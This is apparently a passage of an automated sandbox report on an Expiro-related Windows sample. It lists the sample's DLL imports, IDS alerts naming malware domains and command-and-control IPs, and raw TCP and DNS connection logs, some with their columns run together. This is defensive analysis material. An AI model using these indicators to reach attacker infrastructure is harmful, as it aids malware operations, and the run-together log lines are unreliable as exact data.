KERNEL32.dll:  HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll:    SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll:     SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll:  GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll:  GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll:   DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll:     CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll:  RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Note on reading this import table: the report classifies the sample as a likely compiled AutoIt script, and the DLL set above (WSOCK32, WINMM with mciSendStringW, IPHLPAPI Icmp*, USERENV, UxTheme, the BlockInput/SendInput/keybd_event group, CreateProcessWithLogonW and LogonUserW) is consistent with the AutoIt runtime's own import table rather than with what the embedded script does. Entries such as OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateToolhelp32Snapshot therefore describe capabilities the interpreter exposes to any script; the process-injection and file-infection findings in this report come from the dynamic behaviour, not from the presence of these imports.
Language of compilation system  Country where language is spoken
English                         Great Britain
Timestamp                        SID      Signature                                                                          Severity  Source IP       Source Port  Dest IP         Dest Port  Protocol
2024-11-28T12:11:59.186207+0100  2051648  ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)                       1         192.168.2.22    49881        8.8.8.8         53         UDP
2024-11-28T12:11:59.256622+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         44.221.84.105   80           192.168.2.22    49168      TCP
2024-11-28T12:11:59.256622+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst     1         44.221.84.105   80           192.168.2.22    49168      TCP
2024-11-28T12:12:04.812989+0100  2051649  ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)                      1         192.168.2.22    52781        8.8.8.8         53         UDP
2024-11-28T12:13:38.589710+0100  2850851  ETPRO MALWARE Win32/Expiro.NDO CnC Activity                                        1         192.168.2.22    49176        47.129.31.212   80         TCP
2024-11-28T12:13:38.712649+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         47.129.31.212   80           192.168.2.22    49176      TCP
2024-11-28T12:13:38.712649+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst     1         47.129.31.212   80           192.168.2.22    49176      TCP
2024-11-28T12:13:40.919269+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         13.251.16.150   80           192.168.2.22    49177      TCP
2024-11-28T12:13:40.919269+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst     1         13.251.16.150   80           192.168.2.22    49177      TCP
2024-11-28T12:13:45.265069+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         18.141.10.107   80           192.168.2.22    49179      TCP
2024-11-28T12:13:45.265069+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst     1         18.141.10.107   80           192.168.2.22    49179      TCP
2024-11-28T12:13:49.618320+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         34.246.200.160  80           192.168.2.22    49182      TCP
2024-11-28T12:13:49.618320+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst     1         34.246.200.160  80           192.168.2.22    49182      TCP
2024-11-28T12:13:51.584461+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         18.208.156.248  80           192.168.2.22    49183      TCP
2024-11-28T12:13:51.584461+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst     1         18.208.156.248  80           192.168.2.22    49183      TCP
2024-11-28T12:14:05.039850+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         54.244.188.177  80           192.168.2.22    49187      TCP
2024-11-28T12:14:05.039850+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst     1         54.244.188.177  80           192.168.2.22    49187      TCP
2024-11-28T12:14:06.755681+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz     1         35.164.78.200   80           192.168.2.22    49188      TCP
                                                                                                                                                                2024-11-28T12:14:06.755681+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.2249188TCP
                                                                                                                                                                2024-11-28T12:14:08.144025+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.2249189TCP
                                                                                                                                                                2024-11-28T12:14:08.144025+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.2249189TCP
                                                                                                                                                                2024-11-28T12:14:14.311753+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.2249196TCP
                                                                                                                                                                2024-11-28T12:14:14.311753+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.2249196TCP
                                                                                                                                                                Nov 28, 2024 12:13:14.104820013 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.155978918 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.224860907 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.276052952 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.276109934 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.276232004 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.276252985 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.396188021 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.396200895 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.206341028 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.206403017 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:36.206439018 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:36.326407909 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.394376040 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.514379025 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.514480114 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.522104979 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.522145033 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.642146111 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.642157078 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.589637041 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.589668036 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.589709997 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:38.592606068 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:38.712649107 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.775875092 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:38.897790909 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.897851944 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:38.898021936 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:38.898042917 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:39.018021107 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:39.018059015 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:40.919090986 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:40.919250011 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:40.919269085 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:40.919332981 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:41.039496899 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.575319052 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.695344925 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.695437908 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.697468996 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.697479010 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.817478895 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.817503929 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.839821100 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.839946985 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.840004921 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:42.842756033 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:42.962903023 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.998059988 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.118283033 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:43.118355989 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.118539095 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.118582010 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.238720894 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:43.238732100 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.145045996 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.145164013 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.145173073 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:45.145230055 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:45.265069008 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.302890062 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:45.423063040 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.423124075 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:45.423217058 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:45.423232079 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:45.543288946 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.543323040 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.640199900 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.640266895 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.640305996 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.666440964 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.760278940 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.786530972 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.786587954 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.793849945 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.793869019 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.913928986 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.913940907 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:47.968365908 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:47.968429089 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:47.968456030 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:48.088546038 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:48.116463900 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.236799002 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:48.237060070 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.237174988 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.237195015 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.357358932 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:48.357369900 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:49.618149042 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:49.618309021 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:49.618319988 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:49.618374109 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:49.738291025 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.245723009 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.365896940 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.365962982 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.369756937 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.369798899 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.489897966 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.489919901 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.464062929 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.464222908 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.464231014 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:51.464302063 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:51.584460974 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.704977989 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.825212955 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.827558994 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.828934908 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.829282045 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.948921919 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.949188948 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:52.952058077 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:53.195178032 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:53.367996931 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:53.368021965 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:53.488042116 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:53.488054991 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:53.701627016 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:54.006366968 CET4918480192.168.2.22208.100.26.245
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                Nov 28, 2024 12:12:07.205333948 CET6392653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:07.339690924 CET53639268.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.340986967 CET6551053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:07.464014053 CET53655108.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.465887070 CET6267253192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:07.600780964 CET53626728.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:51.929265976 CET5647553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:52.054832935 CET53564758.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.258462906 CET4938453192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:36.392750025 CET53493848.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.649343014 CET5484253192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:38.772140980 CET53548428.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.439563036 CET5810553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:41.573719025 CET53581058.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.862447023 CET6492853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:42.996898890 CET53649288.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.167891026 CET5739053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:45.302222967 CET53573908.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:47.992669106 CET5809553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:48.115710974 CET53580958.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.120928049 CET5426153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:50.243944883 CET53542618.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.567184925 CET6050753192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:51.702402115 CET53605078.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:54.113997936 CET5044653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:54.248264074 CET53504468.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:01.800045967 CET5593953192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:01.935954094 CET53559398.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.253201962 CET4960853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:03.387825966 CET53496088.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:04.927429914 CET6148653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:05.050311089 CET53614868.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:06.636229038 CET6245353192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:06.759259939 CET53624538.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:08.026230097 CET5056853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:08.149116993 CET53505688.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:10.038036108 CET5944753192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:10.162388086 CET53594478.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:11.666867018 CET5182853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:11.801893950 CET53518288.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:12.488692045 CET5340653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:12.623533964 CET53534068.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:14.218981028 CET5634553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:14.353184938 CET53563458.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:15.844633102 CET5187053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:15.979394913 CET53518708.8.8.8192.168.2.22
